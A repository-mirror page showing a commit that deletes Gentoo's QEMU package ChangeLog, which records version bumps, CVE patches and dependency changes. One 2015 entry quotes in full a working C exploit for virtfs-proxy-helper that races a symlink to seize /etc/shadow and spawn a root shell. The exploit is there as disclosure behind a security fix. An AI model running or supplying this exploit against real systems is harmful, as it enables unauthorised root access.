mirrors/flatcar-scripts
1
0
Fork 0
mirror of https://github.com/flatcar/scripts.git synced 2025-08-23 15:31:05 +02:00
Code Issues Packages Projects Releases Wiki Activity

app-emulation/qemu: sync qemu-2.7.0-r7

Browse Source
This commit is contained in:
Nick Owens 2016-11-29 13:15:25 -08:00
parent a0ac1b44ac
commit 5cd9f4489b
32 changed files with 1111 additions and 2338 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

792
sdk_container/src/third_party/coreos-overlay/app-emulation/qemu/ChangeLog vendored
View File

@ -1,792 +0,0 @@
# ChangeLog for app-emulation/qemu
# Copyright 1999-2016 Gentoo Foundation; Distributed under the GPL v2
# (auto-generated from git log)
*qemu-9999 (09 Aug 2015)
*qemu-2.3.0-r5 (09 Aug 2015)
*qemu-2.3.0-r4 (09 Aug 2015)
09 Aug 2015; Robin H. Johnson <robbat2@gentoo.org> +files/65-kvm.rules,
+files/bridge.conf, +files/qemu-1.7.0-cflags.patch,
+files/qemu-2.2.1-CVE-2015-1779-1.patch,
+files/qemu-2.2.1-CVE-2015-1779-2.patch,
+files/qemu-2.3.0-CVE-2015-3209.patch,
+files/qemu-2.3.0-CVE-2015-3214.patch,
+files/qemu-2.3.0-CVE-2015-3456.patch,
+files/qemu-2.3.0-CVE-2015-5154-1.patch,
+files/qemu-2.3.0-CVE-2015-5154-2.patch,
+files/qemu-2.3.0-CVE-2015-5154-3.patch,
+files/qemu-2.3.0-CVE-2015-5158.patch,
+files/qemu-2.3.0-CVE-2015-5165-1.patch,
+files/qemu-2.3.0-CVE-2015-5165-2.patch,
+files/qemu-2.3.0-CVE-2015-5165-3.patch,
+files/qemu-2.3.0-CVE-2015-5165-4.patch,
+files/qemu-2.3.0-CVE-2015-5165-5.patch,
+files/qemu-2.3.0-CVE-2015-5165-6.patch,
+files/qemu-2.3.0-CVE-2015-5165-7.patch,
+files/qemu-2.3.0-CVE-2015-5166.patch, +files/qemu-binfmt.initd-r1,
+metadata.xml, +qemu-2.3.0-r4.ebuild, +qemu-2.3.0-r5.ebuild,
+qemu-9999.ebuild:
proj/gentoo: Initial commit
This commit represents a new era for Gentoo:
Storing the gentoo-x86 tree in Git, as converted from CVS.
This commit is the start of the NEW history.
Any historical data is intended to be grafted onto this point.
Creation process:
1. Take final CVS checkout snapshot
2. Remove ALL ChangeLog* files
3. Transform all Manifests to thin
4. Remove empty Manifests
5. Convert all stale $Header$/$Id$ CVS keywords to non-expanded Git $Id$
5.1. Do not touch files with -kb/-ko keyword flags.
Signed-off-by: Robin H. Johnson <robbat2@gentoo.org>
X-Thanks: Alec Warner <antarus@gentoo.org> - did the GSoC 2006 migration
tests
X-Thanks: Robin H. Johnson <robbat2@gentoo.org> - infra guy, herding this
project
X-Thanks: Nguyen Thai Ngoc Duy <pclouds@gentoo.org> - Former Gentoo
developer, wrote Git features for the migration
X-Thanks: Brian Harring <ferringb@gentoo.org> - wrote much python to improve
cvs2svn
X-Thanks: Rich Freeman <rich0@gentoo.org> - validation scripts
X-Thanks: Patrick Lauer <patrick@gentoo.org> - Gentoo dev, running new 2014
work in migration
X-Thanks: Michał Górny <mgorny@gentoo.org> - scripts, QA, nagging
X-Thanks: All of other Gentoo developers - many ideas and lots of paint on
the bikeshed
*qemu-2.3.0-r6 (10 Aug 2015)
10 Aug 2015; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.3.0-virtio-serial.patch, +qemu-2.3.0-r6.ebuild:
qemu: fix from upstream for virtio-serial security issue #557206
10 Aug 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.3.0-r6.ebuild:
qemu: do not put directly into stable
*qemu-2.3.1 (12 Aug 2015)
12 Aug 2015; Mike Frysinger <vapier@gentoo.org> +qemu-2.3.1.ebuild:
qemu: version bump to 2.3.1
*qemu-2.4.0 (12 Aug 2015)
12 Aug 2015; Mike Frysinger <vapier@gentoo.org> +qemu-2.4.0.ebuild:
qemu: version bump to 2.4.0
14 Aug 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.4.0.ebuild,
qemu-9999.ebuild:
depend on libepoxy for USE=opengl #557488
14 Aug 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.4.0.ebuild,
qemu-9999.ebuild:
move more deps to softmmu-only case
These packages are only used when building softmmu binaries, so don't try
pulling them in when the user is building tools or user binaries.
14 Aug 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.3.0-r4.ebuild,
qemu-2.3.0-r5.ebuild, qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild,
qemu-2.4.0.ebuild, qemu-9999.ebuild:
switch to virtual/libusb to quiet repoman
Now that the virtual requires the latest libusb, we can switch to that
rather than depending directly on libusb's version.
16 Aug 2015; Justin Lecher <jlec@gentoo.org> metadata.xml,
qemu-2.3.0-r4.ebuild, qemu-2.3.0-r5.ebuild, qemu-2.3.0-r6.ebuild,
qemu-2.3.1.ebuild, qemu-2.4.0.ebuild, qemu-9999.ebuild:
Use slot operators for ncurses
Package-Manager: portage-2.2.20.1
Signed-off-by: Justin Lecher <jlec@gentoo.org>
24 Aug 2015; Justin Lecher <jlec@gentoo.org> metadata.xml,
qemu-2.3.0-r4.ebuild, qemu-2.3.0-r5.ebuild, qemu-2.3.0-r6.ebuild,
qemu-2.3.1.ebuild, qemu-2.4.0.ebuild, qemu-9999.ebuild:
Use https by default
Convert all URLs for sites supporting encrypted connections from http to
https
Signed-off-by: Justin Lecher <jlec@gentoo.org>
24 Aug 2015; Mike Gilbert <floppym@gentoo.org> metadata.xml:
Revert DOCTYPE SYSTEM https changes in metadata.xml
repoman does not yet accept the https version.
This partially reverts eaaface92ee81f30a6ac66fe7acbcc42c00dc450.
Bug: https://bugs.gentoo.org/552720
26 Aug 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.3.0-r4.ebuild,
qemu-2.3.0-r5.ebuild, qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild,
qemu-2.4.0.ebuild, qemu-9999.ebuild:
sys-libs/ncurses: move to SLOT=0 #557472
Use SLOT=0 for installing of main development files like other packages
so we can use other SLOTs for installing SONAME libs for binary packages.
28 Aug 2015; Manuel Rüger <mrueg@gentoo.org> -qemu-2.3.0-r4.ebuild:
Remove vulnerable
Package-Manager: portage-2.2.20.1
07 Sep 2015; Mike Frysinger <vapier@gentoo.org> qemu-9999.ebuild:
add new targets
07 Sep 2015; Mike Frysinger <vapier@gentoo.org> qemu-9999.ebuild:
update seabios pin to version 1.8.2
07 Sep 2015; Mike Frysinger <vapier@gentoo.org> qemu-9999.ebuild:
add target sanity checks
This way we know up front when a new target appears rather than when
someone happens to check & notice.
*qemu-2.4.0-r1 (07 Sep 2015)
07 Sep 2015; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.4.0-CVE-2015-5225.patch,
+files/qemu-2.4.0-block-mirror-crash.patch,
+files/qemu-2.4.0-e1000-loop.patch, -qemu-2.4.0.ebuild,
+qemu-2.4.0-r1.ebuild:
various fixes/updates
Sync in the updates from the 9999 ebuild:
- updated seabios pin
- add new targets
- add sanity checks for targets
Add fix from upstream for blockcommit crashes #558396.
Add fix from upstream for CVE-2015-5225 #558416.
Add fix posted upstream (but not yet merged) for e1000 infinite loop
#559656.
08 Sep 2015; Agostino Sarubbo <ago@gentoo.org> qemu-2.4.0-r1.ebuild:
amd64 stable wrt bug #558416
Package-Manager: portage-2.2.20.1
RepoMan-Options: --include-arches="amd64"
08 Sep 2015; Agostino Sarubbo <ago@gentoo.org> qemu-2.4.0-r1.ebuild:
x86 stable wrt bug #558416
Package-Manager: portage-2.2.20.1
RepoMan-Options: --include-arches="x86"
11 Sep 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.4.0-r1.ebuild,
qemu-9999.ebuild:
require mesa[egl] too
Upstream commit 7ced9e9f6da2257224591b91727cfeee4f3977fb made the egl
layer of mesa a requirement.
16 Sep 2015; Mike Frysinger <vapier@gentoo.org> qemu-9999.ebuild:
switch USE=tls to USE=gnutls #560574
Upstream no longer has dedicated configuration options for tls settings.
Instead, it's all run through the gnutls feature test.
We require newer versions of gnutls because supporting older ones gets a
bit messy -- qemu might leverage libgcrypt or nettle depending on how the
gnutls package was built. By forcing the latest version, we can simplify
and only require nettle. This isn't a big deal as it's already stable.
26 Sep 2015; Mike Frysinger <vapier@gentoo.org> qemu-9999.ebuild:
add tilegx linux-user target #561322
29 Sep 2015; Mike Frysinger <vapier@gentoo.org> qemu-9999.ebuild:
update smartcard configure flag #561670
*qemu-2.4.0.1 (10 Oct 2015)
10 Oct 2015; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.4.0-CVE-2015-6855.patch,
+files/qemu-2.4.0-CVE-2015-7295-1.patch,
+files/qemu-2.4.0-CVE-2015-7295-2.patch,
+files/qemu-2.4.0-CVE-2015-7295-3.patch, +qemu-2.4.0.1.ebuild:
version bump to 2.4.0.1 #562594
This also includes security fixes for #560760 #560550 #560422.
*qemu-2.4.0.1-r1 (15 Oct 2015)
15 Oct 2015; Markos Chandras <hwoarang@gentoo.org>
+files/qemu-2.4-mips-fix-mtc0.patch, +files/qemu-2.4-mips-fix-rdhwr.patch,
+files/qemu-2.4-mips-move-interrupts-new-func.patch,
+files/qemu-2.4-mips-wake-up-on-irq.patch, +qemu-2.4.0.1-r1.ebuild:
Backport a few MIPS patches. Bug #563162
Package-Manager: portage-2.2.23
26 Oct 2015; Mike Frysinger <vapier@gentoo.org> qemu-9999.ebuild:
update qmp doc paths #564186
*qemu-2.4.1 (06 Nov 2015)
06 Nov 2015; Mike Frysinger <vapier@gentoo.org> +qemu-2.4.1.ebuild:
version bump to 2.4.1 #564990
07 Nov 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.4.0-r1.ebuild,
qemu-2.4.0.1.ebuild, qemu-2.4.0.1-r1.ebuild, qemu-2.4.1.ebuild,
qemu-9999.ebuild:
force C locale for sorting to workaround glibc bug #564936
23 Nov 2015; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.0-cflags.patch, qemu-9999.ebuild:
update cflags patch #565866
07 Dec 2015; Doug Goldstein <cardoe@gentoo.org> qemu-2.3.0-r5.ebuild,
qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild, qemu-2.4.0-r1.ebuild,
qemu-2.4.0.1.ebuild, qemu-2.4.0.1-r1.ebuild, qemu-2.4.1.ebuild,
qemu-9999.ebuild:
utilize xen-tools sub-slot
app-emulation/xen-tools now exposes a sub-slot to help dependencies
rebuild when necessary.
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
*qemu-2.4.1-r1 (08 Dec 2015)
08 Dec 2015; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.4.1-CVE-2015-7504.patch,
+files/qemu-2.4.1-CVE-2015-7512.patch,
+files/qemu-2.4.1-CVE-2015-8345.patch, +qemu-2.4.1-r1.ebuild:
add upstream security fixes #566792 #567144
08 Dec 2015; Mike Frysinger <vapier@gentoo.org> metadata.xml,
qemu-9999.ebuild:
add USE=virgl for Virgil 3d GPU #566994
08 Dec 2015; Mike Frysinger <vapier@gentoo.org> qemu-9999.ebuild:
switch to new libcacard release #561814
*qemu-2.4.0.1-r2 (14 Dec 2015)
*qemu-2.4.0-r2 (14 Dec 2015)
*qemu-2.3.1-r1 (14 Dec 2015)
*qemu-2.3.0-r7 (14 Dec 2015)
14 Dec 2015; Jason A. Donenfeld <zx2c4@gentoo.org> +qemu-2.3.0-r7.ebuild,
+qemu-2.3.1-r1.ebuild, +qemu-2.4.0-r2.ebuild, +qemu-2.4.0.1-r2.ebuild:
critical security fix
The virtfs-proxy-helper program is not a safe binary to give caps.
The following exploit code demonstrates the vulnerability:
~=~=~=~= snip ~=~=~=~=
/* == virtfshell ==
*
* Some distributions make virtfs-proxy-helper from QEMU either SUID or
* give it CAP_CHOWN fs capabilities. This is a terrible idea. While
* virtfs-proxy-helper makes some sort of flimsy check to make sure
* its socket path doesn't already exist, it is vulnerable to TOCTOU.
*
* This should spawn a root shell eventually on vulnerable systems.
*
* - zx2c4
* 2015-12-12
*
*
* zx2c4@thinkpad ~ $ lsb_release -i
* Distributor ID: Gentoo
* zx2c4@thinkpad ~ $ ./virtfshell
* == Virtfshell - by zx2c4 ==
* [+] Beginning race loop
* [+] Chown'd /etc/shadow, elevating to root
* [+] Cleaning up
* [+] Spawning root shell
* thinkpad zx2c4 # whoami
* root
*
*/
#include <stdio.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
static int it_worked(void)
{
struct stat sbuf = { 0 };
stat("/etc/shadow", &sbuf);
return sbuf.st_uid == getuid() && sbuf.st_gid == getgid();
}
int main(int argc, char **argv)
{
int fd;
pid_t pid;
char uid[12], gid[12];
sprintf(uid, "%d", getuid());
sprintf(gid, "%d", getgid());
printf("== Virtfshell - by zx2c4 ==\n");
printf("[+] Beginning race loop\n");
while (!it_worked()) {
fd = inotify_init();
unlink("/tmp/virtfshell/sock");
mkdir("/tmp/virtfshell", 0777);
inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE);
pid = fork();
if (!pid) {
close(0);
close(1);
close(2);
execlp("virtfs-proxy-helper", "virtfs-proxy-helper",
"-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock",
NULL);
_exit(1);
}
read(fd, 0, 0);
unlink("/tmp/virtfshell/sock");
symlink("/etc/shadow", "/tmp/virtfshell/sock");
close(fd);
kill(pid, SIGKILL);
wait(NULL);
}
printf("[+] Chown'd /etc/shadow, elevating to root\n");
system( "cp /etc/shadow /tmp/original_shadow;"
"sed 's/^root:.*/root::::::::/' /etc/shadow >
/tmp/modified_shadow;"
"cat /tmp/modified_shadow > /etc/shadow;"
"su -c '"
" echo [+] Cleaning up;"
" cat /tmp/original_shadow > /etc/shadow;"
" chown root:root /etc/shadow;"
" rm /tmp/modified_shadow /tmp/original_shadow;"
" echo [+] Spawning root shell;"
" exec /bin/bash -i"
"'");
return 0;
}
15 Dec 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.3.0-r5.ebuild,
qemu-2.3.0-r6.ebuild, qemu-2.3.1.ebuild, qemu-2.4.0-r1.ebuild,
qemu-2.4.0.1.ebuild, qemu-2.4.0.1-r1.ebuild, qemu-2.4.1.ebuild,
qemu-2.4.1-r1.ebuild, qemu-9999.ebuild:
drop virtfs-proxy-helper fcaps from all versions #568226
*qemu-2.4.1-r2 (15 Dec 2015)
15 Dec 2015; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.4.1-CVE-2015-7549.patch,
+files/qemu-2.4.1-CVE-2015-8504.patch, +qemu-2.4.1-r2.ebuild:
add upstream fixes for #567828 #568214
16 Dec 2015; Agostino Sarubbo <ago@gentoo.org> qemu-2.4.1-r2.ebuild:
amd64 stable wrt bug #567828
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
16 Dec 2015; Agostino Sarubbo <ago@gentoo.org> qemu-2.4.1-r2.ebuild:
x86 stable wrt bug #567828
Package-Manager: portage-2.2.24
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
*qemu-2.5.0 (17 Dec 2015)
17 Dec 2015; Mike Frysinger <vapier@gentoo.org> +qemu-2.5.0.ebuild:
version bump to 2.5.0
17 Dec 2015; Mike Frysinger <vapier@gentoo.org>
-files/qemu-2.2.1-CVE-2015-1779-1.patch,
-files/qemu-2.2.1-CVE-2015-1779-2.patch,
-files/qemu-2.3.0-CVE-2015-3209.patch,
-files/qemu-2.3.0-CVE-2015-3214.patch,
-files/qemu-2.3.0-CVE-2015-3456.patch,
-files/qemu-2.3.0-CVE-2015-5154-1.patch,
-files/qemu-2.3.0-CVE-2015-5154-2.patch,
-files/qemu-2.3.0-CVE-2015-5154-3.patch,
-files/qemu-2.3.0-CVE-2015-5158.patch,
-files/qemu-2.3.0-CVE-2015-5165-1.patch,
-files/qemu-2.3.0-CVE-2015-5165-2.patch,
-files/qemu-2.3.0-CVE-2015-5165-3.patch,
-files/qemu-2.3.0-CVE-2015-5165-4.patch,
-files/qemu-2.3.0-CVE-2015-5165-5.patch,
-files/qemu-2.3.0-CVE-2015-5165-6.patch,
-files/qemu-2.3.0-CVE-2015-5165-7.patch,
-files/qemu-2.3.0-CVE-2015-5166.patch,
-files/qemu-2.3.0-virtio-serial.patch,
-files/qemu-2.4.0-CVE-2015-5225.patch,
-files/qemu-2.4.0-CVE-2015-6855.patch,
-files/qemu-2.4.0-CVE-2015-7295-1.patch,
-files/qemu-2.4.0-CVE-2015-7295-2.patch,
-files/qemu-2.4.0-CVE-2015-7295-3.patch,
-files/qemu-2.4.0-block-mirror-crash.patch,
-files/qemu-2.4.0-e1000-loop.patch, -qemu-2.3.0-r5.ebuild,
-qemu-2.3.0-r6.ebuild, -qemu-2.3.0-r7.ebuild, -qemu-2.3.1.ebuild,
-qemu-2.3.1-r1.ebuild, -qemu-2.4.0-r1.ebuild, -qemu-2.4.0-r2.ebuild,
-qemu-2.4.0.1.ebuild, -qemu-2.4.0.1-r1.ebuild, -qemu-2.4.0.1-r2.ebuild,
-qemu-2.4.1.ebuild, -qemu-2.4.1-r1.ebuild:
drop versions <2.4.1-r2
20 Dec 2015; Mike Frysinger <vapier@gentoo.org> qemu-2.5.0.ebuild,
qemu-9999.ebuild:
disable libgcrypt usage #568856
*qemu-2.5.0-r1 (18 Jan 2016)
18 Jan 2016; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.0-CVE-2015-8558.patch,
+files/qemu-2.5.0-CVE-2015-8567.patch,
+files/qemu-2.5.0-CVE-2015-8701.patch,
+files/qemu-2.5.0-CVE-2015-8743.patch,
+files/qemu-2.5.0-CVE-2016-1568.patch, +qemu-2.5.0-r1.ebuild:
add upstream fixes for #567868 #568246 #570110 #570988 #571566
24 Jan 2016; Michał Górny <mgorny@gentoo.org> metadata.xml:
Replace all herds with appropriate projects (GLEP 67)
Replace all uses of herd with appropriate project maintainers, or no
maintainers in case of herds requested to be disbanded.
24 Jan 2016; Michał Górny <mgorny@gentoo.org> metadata.xml:
Set appropriate maintainer types in metadata.xml (GLEP 67)
26 Jan 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r1.ebuild:
amd64 stable wrt bug #571566
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
26 Jan 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r1.ebuild:
x86 stable wrt bug #571566
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
15 Feb 2016; Doug Goldstein <cardoe@gentoo.org>
-files/qemu-1.7.0-cflags.patch, -files/qemu-2.4-mips-fix-mtc0.patch,
-files/qemu-2.4-mips-fix-rdhwr.patch,
-files/qemu-2.4-mips-move-interrupts-new-func.patch,
-files/qemu-2.4-mips-wake-up-on-irq.patch,
-files/qemu-2.4.1-CVE-2015-7504.patch,
-files/qemu-2.4.1-CVE-2015-7512.patch,
-files/qemu-2.4.1-CVE-2015-7549.patch,
-files/qemu-2.4.1-CVE-2015-8345.patch,
-files/qemu-2.4.1-CVE-2015-8504.patch, -qemu-2.4.1-r2.ebuild,
-qemu-2.5.0.ebuild:
remove vulnerable versions
Package-Manager: portage-2.2.26
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
15 Feb 2016; Patrick Lauer <patrick@gentoo.org> metadata.xml:
Remove unneeded useflag description from metadata.xml
Package-Manager: portage-2.2.27
19 Feb 2016; Robin H. Johnson <robbat2@gentoo.org> metadata.xml:
restore USE=gnutls use desc for side-effects
commit ea4d1e1fcc just removed the USE=tls, rather than updating it for
USE=gnutls. Per the description, it has side-effects of enabling
enabling WebSocket & disk quorum features.
Package-Manager: portage-2.2.27
28 Feb 2016; Doug Goldstein <cardoe@gentoo.org> qemu-2.5.0-r1.ebuild:
fix arm64 dependencies
arm/arm64 have some dependencies which are higher than other platforms.
Unfortunately the dependencies are not stable on arm but this package is
so arm updates will come later.
Package-Manager: portage-2.2.26
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
28 Feb 2016; Matthew Thode <prometheanfire@gentoo.org> qemu-2.5.0-r1.ebuild:
keywording arm64
merged on X-C1
Package-Manager: portage-2.2.26
15 Mar 2016; Doug Goldstein <cardoe@gentoo.org> qemu-2.5.0-r1.ebuild:
fix arm depends for libseccomp
arm needs libseccomp 2.2.3 or newer for QEMU to be able to utilize it.
Package-Manager: portage-2.2.26
Signed-off-by: Doug Goldstein <cardoe@gentoo.org>
*qemu-2.5.0-r2 (23 Mar 2016)
23 Mar 2016; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.0-CVE-2015-8613.patch,
+files/qemu-2.5.0-CVE-2015-8619.patch,
+files/qemu-2.5.0-CVE-2016-1714.patch,
+files/qemu-2.5.0-CVE-2016-1922.patch,
+files/qemu-2.5.0-CVE-2016-1981.patch,
+files/qemu-2.5.0-CVE-2016-2197.patch,
+files/qemu-2.5.0-CVE-2016-2198.patch,
+files/qemu-2.5.0-CVE-2016-2392.patch,
+files/qemu-2.5.0-rng-stack-corrupt-0.patch,
+files/qemu-2.5.0-rng-stack-corrupt-1.patch,
+files/qemu-2.5.0-rng-stack-corrupt-2.patch,
+files/qemu-2.5.0-rng-stack-corrupt-3.patch,
+files/qemu-2.5.0-sysmacros.patch, +files/qemu-2.5.0-usb-ehci-oob.patch,
+files/qemu-2.5.0-usb-ndis-int-overflow.patch, +qemu-2.5.0-r2.ebuild:
backport various upstream fixes
24 Mar 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r2.ebuild:
amd64 stable wrt bug #578044
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
24 Mar 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r2.ebuild:
x86 stable wrt bug #578044
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
25 Mar 2016; Sergey Popov <pinkbyte@gentoo.org> -qemu-2.5.0-r1.ebuild:
security cleanup
Gentoo-Bug: 576420
Package-Manager: portage-2.2.28
28 Mar 2016; Mike Frysinger <vapier@gentoo.org> qemu-2.5.0-r2.ebuild,
qemu-9999.ebuild:
use l10n.eclass to respect LINGUAS #577814
*qemu-2.5.0-r3 (28 Mar 2016)
28 Mar 2016; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.0-9pfs-segfault.patch,
+files/qemu-2.5.0-ne2000-reg-check.patch, +qemu-2.5.0-r3.ebuild:
add few more upstream fixes #573816 #578142
29 Mar 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r3.ebuild:
amd64 stable wrt bug #573816
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
29 Mar 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.5.0-r3.ebuild:
x86 stable wrt bug #573816
Package-Manager: portage-2.2.26
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
20 Apr 2016; Mike Frysinger <vapier@gentoo.org> qemu-2.5.0-r3.ebuild,
qemu-9999.ebuild:
mention /dev/kvm perm updates in the readme/elog #580436
*qemu-2.5.1 (23 Apr 2016)
23 Apr 2016; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.1-CVE-2015-8558.patch,
+files/qemu-2.5.1-CVE-2016-4020.patch,
+files/qemu-2.5.1-stellaris_enet-overflow.patch, +qemu-2.5.1.ebuild:
app-misc/qemu: version bump & bug fixes #579614 #580040 #580426
12 May 2016; Mike Frysinger <vapier@gentoo.org> qemu-2.5.1.ebuild,
qemu-9999.ebuild:
use subslots w/nettle & gnutls #582836
*qemu-2.6.0 (17 May 2016)
17 May 2016; Mike Frysinger <vapier@gentoo.org> +qemu-2.6.0.ebuild,
qemu-9999.ebuild:
version bump to 2.6.0 #583212
17 May 2016; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.5.1-xfs-linux-headers.patch, qemu-2.5.1.ebuild:
workaround breakage in xfs/linux headers #577810
Add upstream patch to workaround some combinations of xfsprogs & linux
headers so we don't have to worry about stable breakage anymore. This
fix is already in upstream & unstable versions.
18 May 2016; Austin English <wizardedit@gentoo.org>
files/qemu-binfmt.initd-r1:
use #!/sbin/openrc-run instead of #!/sbin/runscript
06 Jun 2016; Mike Frysinger <vapier@gentoo.org> qemu-2.5.0-r2.ebuild,
qemu-2.5.0-r3.ebuild, qemu-2.5.1.ebuild, qemu-2.6.0.ebuild,
qemu-9999.ebuild:
depend on jpeg SLOT=0 for building
07 Jun 2016; Mike Frysinger <vapier@gentoo.org>
+files/qemu-2.6.0-crypto-static.patch, qemu-2.6.0.ebuild, qemu-9999.ebuild:
fix static linking errors w/curl[ssl,curl_ssl_openssl]
21 Jun 2016; Mike Frysinger <vapier@gentoo.org> qemu-9999.ebuild:
drop kvm_stat to match upstream #586158
29 Jun 2016; Alexey Shvetsov <alexxy@gentoo.org> qemu-2.5.0-r2.ebuild,
qemu-2.5.0-r3.ebuild, qemu-2.5.1.ebuild, qemu-2.6.0.ebuild,
qemu-9999.ebuild:
adapt sys-infiniband to sys-fabric rename
Package-Manager: portage-2.3.0_rc1
01 Aug 2016; Mike Frysinger <vapier@gentoo.org> qemu-2.5.1.ebuild,
qemu-2.6.0.ebuild, qemu-9999.ebuild:
handle bzip2 dep #589968
The block layer uses it to support bzip2 compression in dmg images.
That code makes it into softmmu binaries and userland utils.
07 Aug 2016; Luca Barbato <lu_zero@gentoo.org>
+files/qemu-2.6.0-glib-size_t.patch, qemu-2.6.0.ebuild:
Drop a -Werror when it could cause a false positive
The check code could trigger recent compiler warnings.
Package-Manager: portage-2.2.26
15 Aug 2016; Luca Barbato <lu_zero@gentoo.org> files/qemu-binfmt.initd-r1:
Update ppc magic mask
Unbreak using qemu-user with current stage3.
Package-Manager: portage-2.3.0
21 Aug 2016; Luca Barbato <lu_zero@gentoo.org> qemu-9999.ebuild:
Update the languages list
Package-Manager: portage-2.3.0
21 Aug 2016; Luca Barbato <lu_zero@gentoo.org> qemu-9999.ebuild:
Drop a patch
It is already upstreamed.
Package-Manager: portage-2.3.0
05 Sep 2016; Matthias Maier <tamiko@gentoo.org> -qemu-2.5.0-r2.ebuild,
-qemu-2.5.0-r3.ebuild:
remove vulnerable 2.5.0
Package-Manager: portage-2.2.28
*qemu-2.7.0 (05 Sep 2016)
05 Sep 2016; Matthias Maier <tamiko@gentoo.org> +qemu-2.7.0.ebuild:
version bump to 2.7.0, various security fixes
3af9187fc6caaf415ab9c0c6d92c9678f65cb17f -> CVE-2016-4001, bug #579734
3a15cc0e1ee7168db0782133d2607a6bfa422d66 -> CVE-2016-4002, bug #579734
c98c6c105f66f05aa0b7c1d2a4a3f716450907ef -> CVE-2016-4439, bug #583496
6c1fef6b59563cc415f21e03f81539ed4b33ad90 -> CVE-2016-4441, bug #583496
06630554ccbdd25780aa03c3548aaff1eb56dffd -> , bug #583952
844864fbae66935951529408831c2f22367a57b6 -> CVE-2016-5337, bug #584094
b60bdd1f1ee1616b7a9aeeffb4088e1ce2710fb2 -> , bug #584102
1b85898025c4cd95dce673d15e67e60e98e91731 -> , bug #584146
521360267876d3b6518b328051a2e56bca55bef8 -> CVE-2016-4453, bug #584514
4e68a0ee17dad7b8d870df0081d4ab2e079016c2 -> CVE-2016-4454, bug #584514
a6b3167fa0e825aebb5a7cd8b437b6d41584a196 -> CVE-2016-5126, bug #584630
ff589551c8e8e9e95e211b9d8daafb4ed39f1aec -> CVE-2016-5338, bug #584918
d3cdc49138c30be1d3c2f83d18f85d9fdee95f1a -> CVE-2016-5238, bug #584918
1e7aed70144b4673fc26e73062064b6724795e5f -> , bug #589924
afd9096eb1882f23929f5b5c177898ed231bac66 -> CVE-2016-5403, bug #589928
eb700029c7836798046191d62d595363d92c84d4 -> CVE-2016-6835, bug #591244
ead315e43ea0c2ca3491209c6c8db8ce3f2bbe05 -> CVE-2016-6834, bug #591374
6c352ca9b4ee3e1e286ea9e8434bd8e69ac7d0d8 -> CVE-2016-6833, bug #591380
47882fa4975bf0b58dd74474329fdd7154e8f04c -> CVE-2016-6888, bug #591678
805b5d98c649d26fc44d2d7755a97f18e62b438a
56f101ecce0eafd09e2daf1c4eeb1377d6959261
fff39a7ad09da07ef490de05c92c91f22f8002f2 -> , bug #592430
Package-Manager: portage-2.2.28
05 Sep 2016; Matthias Maier <tamiko@gentoo.org>
+files/qemu-2.7.0-CVE-2016-6836.patch, qemu-2.7.0.ebuild:
apply patch for CVE-2016-6836, bug #591242
Package-Manager: portage-2.2.28
05 Sep 2016; Matthias Maier <tamiko@gentoo.org> -qemu-2.6.0.ebuild,
qemu-2.7.0.ebuild:
drop vulnerable 2.6.0
Package-Manager: portage-2.2.28
05 Sep 2016; Matthias Maier <tamiko@gentoo.org>
-files/qemu-2.5.0-9pfs-segfault.patch,
-files/qemu-2.5.0-CVE-2015-8567.patch,
-files/qemu-2.5.0-CVE-2015-8613.patch,
-files/qemu-2.5.0-CVE-2015-8619.patch,
-files/qemu-2.5.0-CVE-2015-8701.patch,
-files/qemu-2.5.0-CVE-2015-8743.patch,
-files/qemu-2.5.0-CVE-2016-1568.patch,
-files/qemu-2.5.0-CVE-2016-1714.patch,
-files/qemu-2.5.0-CVE-2016-1922.patch,
-files/qemu-2.5.0-CVE-2016-1981.patch,
